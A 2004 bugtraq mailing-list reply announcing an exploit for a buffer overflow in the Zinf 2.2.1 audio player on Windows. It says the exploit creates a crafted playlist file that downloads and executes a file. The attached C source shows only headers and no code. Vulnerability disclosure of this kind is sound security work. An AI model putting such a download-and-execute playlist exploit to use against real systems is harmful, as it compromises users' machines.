[36747] in bugtraq


Re: Buffer overflow in Zinf 2.2.1 for Win32+exploit

daemon@ATHENA.MIT.EDU (iggy popal)
Wed Sep 29 16:22:35 2004

Date: Mon, 27 Sep 2004 19:34:19 +0200
From: iggy popal <me@delikon.de>
Reply-To: iggy popal <me@delikon.de>
Message-ID: <34131750.20040927193419@delikon.de>
To: bugtraq@securityfocus.com
In-Reply-To: <20040924213102.7fb91138.aluigi@autistici.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------D14F1571C5333F9"

------------D14F1571C5333F9
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


This exploit creates a file, eploit.pls, which downloads and executes a file.

Keep up your good work, Luigi!

best regards, delikon
------------D14F1571C5333F9
Content-Type: text/plain; name="zinfexploit.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="zinfexploit.c"
------------D14F1571C5333F9--

